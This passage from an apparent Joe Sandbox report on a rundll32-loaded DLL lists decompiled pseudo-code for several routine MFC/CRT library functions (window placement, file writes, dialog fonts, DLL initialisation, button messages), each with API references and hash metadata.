				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t136 + 4)) + 0x4c));
				_t131 = _t136 + 0x48;
				_push(_t131);
				_push(0x1002d9d0);
				_push(_t62);
				if( *((intOrPtr*)( *_t62))() < 0) {
					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t136 + 4)) + 0x4c));
					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x1002d928,  &_v16);
					if(_t66 >= _t107) {
						_t67 = _v16;
						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
						_t69 = _v16;
						 *((intOrPtr*)( *_t69 + 8))(_t69);
						_t71 = _v20;
						if(_t71 != _t107) {
							_t133 = _t136 + 8;
							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x1002fb48, _t133);
							_t73 = _v20;
							 *((intOrPtr*)( *_t73 + 8))(_t73);
							_t66 = _v8;
							if(_t66 >= _t107) {
								_t134 =  *_t133;
								 *((intOrPtr*)( *_t134))(_t134, 0x1002fb38, _t136 + 0xc);
								goto L14;
							}
						} else {
							_t66 = 0x80004005;
						}
					}
				} else {
					_t84 =  *_t131;
					_t135 = _t136 + 0x4c;
					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x1002fd38, _t135);
					if( *_t135 == _t107) {
						_v8 = 0x80004003;
					}
					if(_v8 >= _t107) {
						L14:
						_t137 = E1000E51C(_t136);
						if(_v24 != _t107) {
							E10022A95(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E10022AD3(_v12, _t107);
						}
						_t66 = _t137;
					} else {
						if(_v24 != _t107) {
							E10022A95(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E10022AD3(_v12, _t107);
						}
						_t66 = _v8;
					}
				}
				return _t66;
			}

APIs

IsWindowVisible.USER32(?), ref: 1000E97A
GetDesktopWindow.USER32 ref: 1000E98D
GetWindowRect.USER32 ref: 1000E9A0
GetWindowRect.USER32 ref: 1000E9AD

Part of subcall function 10022A95: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,1000EAEE,?,?), ref: 10022AB0

Part of subcall function 10022AD3: ShowWindow.USER32(?,?,1000EAF7,00000000,?,?), ref: 10022AE0

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Rect$DesktopMoveShowVisible
String ID:
API String ID: 3835705305-0
Opcode ID: e53b169528299ece0fbc0adda44c65623bd7c21512ed9c642497379546d15cdd
Instruction ID: 6cb93d47231a08dfca33c87ea75e007ddcb68ff5e0e10312099a50c478d50c27
Opcode Fuzzy Hash: e53b169528299ece0fbc0adda44c65623bd7c21512ed9c642497379546d15cdd
Instruction Fuzzy Hash: 7D51F575A0024AAFDB00DFE8D984DAEB7B9FF88344B244469F601EB255DB31BD41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001A142 Relevance: 6.1, APIs: 4, Instructions: 145
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001A142(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t68;
				void** _t73;
				signed int _t74;
				long _t76;
				intOrPtr _t79;
				signed int _t81;
				char* _t86;
				int _t91;
				long _t93;
				intOrPtr* _t100;
				void* _t102;
				signed int _t107;
				char _t110;
				struct _OVERLAPPED* _t112;
				long _t115;
				signed int _t118;
				struct _OVERLAPPED* _t120;
				void* _t121;
				void* _t123;

				_t121 = _t123 - 0x3a0;
				_t68 =  *0x100371f4; // 0x82d1d2ba
				_t112 = 0;
				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
				 *(_t121 - 0x78) = 0;
				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
				if( *(_t121 + 0x3b0) != 0) {
					_t100 = 0x1003a6c0 + ( *(_t121 + 0x3a8) >> 5) * 4;
					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
					if(__eflags != 0) {
						E1001B580(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
					}
					_t73 =  *_t100 + _t118;
					__eflags = _t73[1] & 0x00000080;
					if((_t73[1] & 0x00000080) == 0) {
						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
						__eflags = _t74;
						if(_t74 == 0) {
							 *(_t121 - 0x6c) = GetLastError();
						} else {
							 *(_t121 - 0x6c) = _t112;
							 *(_t121 - 0x78) =  *(_t121 - 0x80);
						}
					} else {
						__eflags =  *(_t121 + 0x3b0) - _t112;
						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
						 *(_t121 - 0x6c) = _t112;
						if( *(_t121 + 0x3b0) <= _t112) {
							L25:
							_t79 =  *_t100;
							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
								L28:
								 *((intOrPtr*)(E1001336E())) = 0x1c;
								_t81 = E10013377();
								 *_t81 = _t112;
								L29:
								_t77 = _t81 | 0xffffffff;
								L31:
								goto L32;
							}
							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
							if( *( *(_t121 + 0x3ac)) != 0x1a) {
								goto L28;
							}
							_t77 = 0;
							goto L31;
						} else {
							goto L6;
						}
						do {
							L6:
							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
							__eflags = _t107;
							_t86 = _t121 - 0x68;
							 *(_t121 - 0x70) = _t112;
							do {
								__eflags = _t107 -  *(_t121 + 0x3b0);
								if(_t107 >=  *(_t121 + 0x3b0)) {
									break;
								}
								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
								_t110 =  *( *(_t121 - 0x74));
								_t107 = _t107 + 1;
								__eflags = _t110 - 0xa;
								if(_t110 == 0xa) {
									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
									 *_t86 = 0xd;
									_t86 = _t86 + 1;
									_t34 = _t121 - 0x70;
									 *_t34 =  &( *(_t121 - 0x70)->Internal);
									__eflags =  *_t34;
								}
								 *_t86 = _t110;
								_t86 = _t86 + 1;
								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
								__eflags =  *(_t121 - 0x70) - 0x400;
							} while ( *(_t121 - 0x70) < 0x400);
							_t115 = _t86 - _t121 - 0x68;
							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
							__eflags = _t91;
							if(_t91 == 0) {
								 *(_t121 - 0x6c) = GetLastError();
								L16:
								_t112 = 0;
								__eflags = 0;
								L17:
								_t76 =  *(_t121 - 0x78);
								__eflags = _t76 - _t112;
								if(_t76 != _t112) {
									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									goto L31;
								}
								__eflags =  *(_t121 - 0x6c) - _t112;
								if( *(_t121 - 0x6c) == _t112) {
									goto L25;
								}
								_t120 = 5;
								__eflags =  *(_t121 - 0x6c) - _t120;
								if( *(_t121 - 0x6c) != _t120) {
									_t81 = E10013380( *(_t121 - 0x6c));
								} else {
									 *((intOrPtr*)(E1001336E())) = 9;
									_t81 = E10013377();
									 *_t81 = _t120;
								}
								goto L29;
							}
							_t93 =  *(_t121 - 0x80);
							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
							__eflags = _t93 - _t115;
							if(_t93 < _t115) {
								goto L16;
							}
							_t112 = 0;
							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
					}
					goto L17;
				} else {
					_t77 = 0;
					L32:
					return E10011A49(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
				}
			}

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,10037780,00000001), ref: 1001A22A

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 1bc4981f5cdbf42746497e340523dd52149d5080cc4ecba6cabab4f8cc186ea5
Instruction ID: 62bfa9db21814b1307c6d0c5a82aa6b64fc1d60686e85dc8a58053d1baf4ffac
Opcode Fuzzy Hash: 1bc4981f5cdbf42746497e340523dd52149d5080cc4ecba6cabab4f8cc186ea5
Instruction Fuzzy Hash: 57512471900298DFDB22CFA8C880ADDBBF8FF46354F214119E8599F266DB319A81CF11

Uniqueness

Uniqueness Score: -1.00%

Function 10023F12 Relevance: 6.1, APIs: 4, Instructions: 115
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10023F12(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
				intOrPtr _v8;
				short _v72;
				signed int _v76;
				signed int _v80;
				void** _v84;
				signed int _v88;
				intOrPtr _t52;
				short* _t65;
				void* _t74;
				short* _t81;
				void* _t86;
				char* _t92;
				signed int _t93;
				signed int* _t95;
				void** _t96;
				signed int _t101;
				signed int _t103;
				void* _t106;

				_t52 =  *0x100371f4; // 0x82d1d2ba
				_v8 = _t52;
				_v84 = __ecx;
				if(__ecx[1] != 0) {
					_t95 = GlobalLock( *__ecx);
					_v80 = 0 | _t95[0] == 0x0000ffff;
					_v76 = E10023D85(_t95);
					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
					_v88 = _t101;
					if(_v80 == 0) {
						 *_t95 =  *_t95 | 0x00000040;
					} else {
						_t95[3] = _t95[3] | 0x00000040;
					}
					if(lstrlenA(_a4) < 0x20) {
						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
						_t65 = E10023E04(_t95);
						_t86 = 0;
						_t81 = _t65;
						if(_v76 != 0) {
							_t86 = _t101 + 2 + E10012ED9(_t81 + _t101) * 2;
						}
						_t92 = _a4;
						_t31 = _t81 + 3; // 0x3
						_t33 = _t92 + 3; // 0x3
						_t67 = _t86 + _t31 & 0xfffffffc;
						_t103 = _t81 + _t33 & 0xfffffffc;
						_v76 = _t86 + _t31 & 0xfffffffc;
						if(_v80 == 0) {
							_t93 = _t95[2];
						} else {
							_t93 = _t95[4];
						}
						if(_a4 != _t86 && _t93 > 0) {
							E10012090(_t103, _t67, _t95 - _t67 + _v84[1]);
							_t106 = _t106 + 0xc;
						}
						 *_t81 = _a8;
						E10012090(_t81 + _v88,  &_v72, _a4 - _v88);
						_t96 = _v84;
						_t96[1] = _t96[1] + _t103 - _v76;
						GlobalUnlock( *_t96);
						_t96[2] = _t96[2] & 0x00000000;
						_t74 = 1;
					} else {
						_t74 = 0;
					}
				} else {
					_t74 = 0;
				}
				return E10011A49(_t74, _v8);
			}

APIs

GlobalLock.KERNEL32 ref: 10023F36
lstrlenA.KERNEL32(?), ref: 10023F7A

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: GlobalLocklstrlen
String ID:
API String ID: 1144527523-0
Opcode ID: 6d27e22fb689a02b6ab81224eeade330f7838502c15867fce9e2cf887c2292dc
Instruction ID: d6e0db555126f9e18a7e3546907a938c313cf4e51e5ace9a59664a29dd2540ae
Opcode Fuzzy Hash: 6d27e22fb689a02b6ab81224eeade330f7838502c15867fce9e2cf887c2292dc
Instruction Fuzzy Hash: F341C372D00219EFCB14DFB4D98599EBBB9FF04354B60C22AE816DB151DB30E999CB80

Uniqueness

Uniqueness Score: -1.00%

Function 10011729 Relevance: 6.1, APIs: 4, Instructions: 113
threadCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E10011729(void* __ecx, long* _a8) {
				void* _v8;
				void* __esi;
				void* __ebp;
				long* _t9;
				long* _t11;
				long* _t14;
				long _t17;
				signed int _t25;
				long* _t33;
				long* _t36;
				long* _t38;
				long* _t39;
				void* _t40;
				long _t47;
				long _t50;
				void* _t51;
				void* _t52;
				long* _t53;
				struct _OSVERSIONINFOA* _t54;
				signed int _t56;
				struct _OSVERSIONINFOA* _t58;

				_t9 = _a8;
				if(_t9 != 1) {
					__eflags = _t9;
					if(_t9 != 0) {
						__eflags = _t9 - 2;
						if(__eflags != 0) {
							__eflags = _t9 - 3;
							if(_t9 == 3) {
								E100144AB(0);
							}
							L27:
							_t11 = 1;
							__eflags = 1;
							L28:
							return _t11;
						}
						_push(0x8c);
						_push(1);
						_t53 = E10013955(_t40, _t51, _t52, __eflags);
						__eflags = _t53;
						if(_t53 == 0) {
							L24:
							_t11 = 0;
							goto L28;
						}
						_t14 =  *0x1003a1d0( *0x10037494, _t53);
						__eflags = _t14;
						_push(_t53);
						if(_t14 == 0) {
							E1001111B();
							goto L24;
						}
						E100142E0();
						_t17 = GetCurrentThreadId();
						_t53[1] = _t53[1] | 0xffffffff;
						 *_t53 = _t17;
						goto L27;
					}
					__eflags =  *0x1003a15c - _t9; // 0x0
					if(__eflags <= 0) {
						goto L24;
					}
					 *0x1003a15c =  *0x1003a15c - 1;
					__eflags =  *0x1003a1b0 - _t9; // 0x1
					if(__eflags == 0) {
						E10011C43();
					}
					E10016932();
					E100142C3();
					E10014B0C();
					goto L27;
				}
				E100116D0(0x94, __ecx);
				_t54 = _t58;
				_t54->dwOSVersionInfoSize = 0x94;
				if(GetVersionExA(_t54) == 0) {
					goto L24;
				}
				_t47 = _t54->dwPlatformId;
				 *0x1003a174 = _t47;
				_t25 = _t54->dwMajorVersion;
				 *0x1003a180 = _t25;
				_t50 = _t54->dwMinorVersion;
				 *0x1003a184 = _t50;
				_t56 = _t54->dwBuildNumber & 0x00007fff;
				 *0x1003a178 = _t56;
				if(_t47 != 2) {
					 *0x1003a178 = _t56 | 0x00008000;
				}
				 *0x1003a17c = (_t25 << 8) + _t50;
				if(E10014ABB(1) != 0) {
					if(E100144DA() != 0) {
						E10016D75(__eflags);
						 *0x1003ba50 = GetCommandLineA();
						 *0x1003a160 = E10016C53();
						_t33 = E10016734();
						__eflags = _t33;
						if(_t33 < 0) {
							L13:
							E100142C3();
							goto L6;
						}
						_t36 = E10016BB1();
						__eflags = _t36;
						if(_t36 < 0) {
							L12:
							E10016932();
							goto L13;
						}
						_t38 = E1001697E();
						__eflags = _t38;
						if(_t38 < 0) {
							goto L12;
						}
						_t39 = E10011B05(0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L12;
						}
						 *0x1003a15c =  *0x1003a15c + 1;
						goto L27;
					}
					L6:
					E10014B0C();
				}
			}

APIs

GetVersionExA.KERNEL32(?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 1001174C
GetCommandLineA.KERNEL32(?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 100117C6

Part of subcall function 10016C53: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016C6F
Part of subcall function 10016C53: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016CA5
Part of subcall function 10016C53: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,100117D6), ref: 10016CD9
Part of subcall function 10016C53: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,100117D6,?,?), ref: 10016CFB
Part of subcall function 10016C53: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016D14

Part of subcall function 10013955: __lock.LIBCMT ref: 10013999
Part of subcall function 10013955: RtlAllocateHeap.NTDLL(00000008,?,1002E908,00000010,1001431B,00000001,0000008C,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000), ref: 100139D7

FlsSetValue.KERNEL32(00000000,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10011869
GetCurrentThreadId.KERNEL32 ref: 1001187A

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharMultiWide$AllocateCommandCurrentFreeHeapLineThreadValueVersion__lock
String ID:
API String ID: 770256606-0
Opcode ID: f66bb59ed05a3764a3b6657b8b9666b6193ba35cdd237db02441929a540a1d75
Instruction ID: c47be153584374b7353cf999a54b0a280028856245a957f2bce7d5ed9b2b22c2
Opcode Fuzzy Hash: f66bb59ed05a3764a3b6657b8b9666b6193ba35cdd237db02441929a540a1d75
Instruction Fuzzy Hash: EC318F39D046629FE32DDFB08C4269E77E4EF06351F218529E855CE2A2DF30E8C08652

Uniqueness

Uniqueness Score: -1.00%

Function 100245EB Relevance: 6.1, APIs: 4, Instructions: 103
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100245EB(void* __ecx, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* _t43;
				long _t48;
				signed int* _t51;
				signed int* _t54;
				signed int* _t57;
				struct _FILETIME* _t67;
				void* _t81;
				CHAR* _t82;
				signed int* _t83;
				void* _t86;

				_t83 = _a4;
				_t81 = __ecx;
				E10012400(_t83, 0, 0x128);
				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
				_t43 =  *(_t81 + 4);
				_t86 = _t43 -  *0x1002d628; // 0xffffffff
				if(_t86 == 0) {
					L12:
					return 1;
				}
				_t67 =  &_v12;
				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
					L4:
					return 0;
				}
				_t48 = GetFileSize( *(_t81 + 4), 0);
				_t83[6] = _t48;
				_t83[7] = 0;
				if(_t48 != 0xffffffff || 0 != 0) {
					_t82 =  *(_t81 + 0xc);
					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
					} else {
						_t83[8] = 0;
					}
					_t51 = E10010922( &_v36,  &_v12, 0xffffffff);
					 *_t83 =  *_t51;
					_t83[1] = _t51[1];
					_t54 = E10010922( &_v36,  &_v20, 0xffffffff);
					_t83[4] =  *_t54;
					_t83[5] = _t54[1];
					_t57 = E10010922( &_v36,  &_v28, 0xffffffff);
					_t83[2] =  *_t57;
					_t83[3] = _t57[1];
					if(( *_t83 | _t83[1]) == 0) {
						 *_t83 =  *_t57;
						_t83[1] = _t57[1];
					}
					if((_t83[4] | _t83[5]) == 0) {
						_t83[4] = _t83[2];
						_t83[5] = _t83[3];
					}
					goto L12;
				} else {
					goto L4;
				}
			}

APIs

lstrcpynA.KERNEL32(?,?,00000104), ref: 10024616
GetFileTime.KERNEL32(?,?,?,?), ref: 10024638
GetFileSize.KERNEL32(?,00000000), ref: 10024646
GetFileAttributesA.KERNEL32(?), ref: 10024670

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID:
API String ID: 1499663573-0
Opcode ID: a91baa48bf4037b4f45bc0b7e9cdde213090107d6af27a7cdbb34c679ba3c83b
Instruction ID: 7d7a2e8bbb17eb29deeb0aed23558d3c2c2ea8bfdd4d9c760b90b36e29905935
Opcode Fuzzy Hash: a91baa48bf4037b4f45bc0b7e9cdde213090107d6af27a7cdbb34c679ba3c83b
Instruction Fuzzy Hash: 2D417CB5500A05AFD724DF64D894CAABBF8FF093207518A2DE1A6976A0EB30F945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10022F70 Relevance: 6.1, APIs: 4, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10022F70(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001D91C( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E10007404( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E10007404( &_a4)));
								_v8 =  *((intOrPtr*)(E10007404( &_a4)));
								if((E10022BC1(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E1000898C( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E1000898C( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E10022BC1(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

APIs

SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 10022FA4
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 10023009
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 1002304E
SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 10023077

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3c2821d2c01730d0e9e3d050fdca3f67cb787b233dffa796d2ae3b4fd65ef274
Instruction ID: eb435eb8790fdb392b85cf7e94e3c3ef61883645fe82c46af5ce08a909e1fc74
Opcode Fuzzy Hash: 3c2821d2c01730d0e9e3d050fdca3f67cb787b233dffa796d2ae3b4fd65ef274
Instruction Fuzzy Hash: E1316F30500219FFCB25DF55D8E1EAE7BE9EF01790F50806AF9059B216DA71ED81DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C667 Relevance: 6.1, APIs: 4, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E1000C667(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t71;

				_t71 = _a4 + 0xffffff2c;
				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
					return 0;
				}
				_t58 = _a8;
				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
					L4:
					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
						__imp__#9(_t71 + 0xa8);
						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
						_push( &_a4);
						_push(0x1002cfe8);
						_a4 = 0;
						_push(_t41);
						if( *((intOrPtr*)( *_t41))() >= 0) {
							E10012400( &_v56, 0, 0x20);
							E10012400( &_v24, 0, 0x10);
							_t47 = _a4;
							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x1002fb68, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
							_t60 = __imp__#6;
							_a8 = _t48;
							if(_v52 != 0) {
								 *_t60(_v52);
							}
							if(_v48 != 0) {
								 *_t60(_v48);
							}
							if(_v44 != 0) {
								 *_t60(_v44);
							}
							_t49 = _a4;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							if(_a8 >= 0) {
								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
							}
						}
					}
					_t39 = 0;
					goto L15;
				} else {
					_v60 = 2;
					_v56 = _t58;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					E1000AC01(_t71,  &_v60);
					_t39 = _v36;
					if(_t39 != 0) {
						L15:
						return _t39;
					}
					goto L4;
				}
			}

APIs

VariantClear.OLEAUT32(?), ref: 1000C6DA
SysFreeString.OLEAUT32(?), ref: 1000C749
SysFreeString.OLEAUT32(?), ref: 1000C753
SysFreeString.OLEAUT32(?), ref: 1000C75D

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FreeString$ClearVariant
String ID:
API String ID: 3349467263-0
Opcode ID: 8081ddf9c49625f3210156444a31ac976f120d6f02dfe19842348a48be0f878d
Instruction ID: 422d1a6ef49465b8a85e9ad1b89baa88a5c31b660c424cf8f1d44a9922b37e56
Opcode Fuzzy Hash: 8081ddf9c49625f3210156444a31ac976f120d6f02dfe19842348a48be0f878d
Instruction Fuzzy Hash: 71310571911219AFDB04DFA5CC84EDEBBB8FF09790F10821AF509A6254D770A984CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001C96A Relevance: 6.1, APIs: 4, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001C96A(void* __ecx, void* __eflags) {
				short* _t40;
				intOrPtr _t42;
				int _t57;
				short* _t64;
				int _t67;
				void* _t68;
				short* _t69;

				_t58 = __ecx;
				_t69 =  *(_t68 - 0x18);
				E100114D8(__ecx, __eflags);
				 *(_t68 - 0x34) =  *(_t68 - 0x34) & 0x00000000;
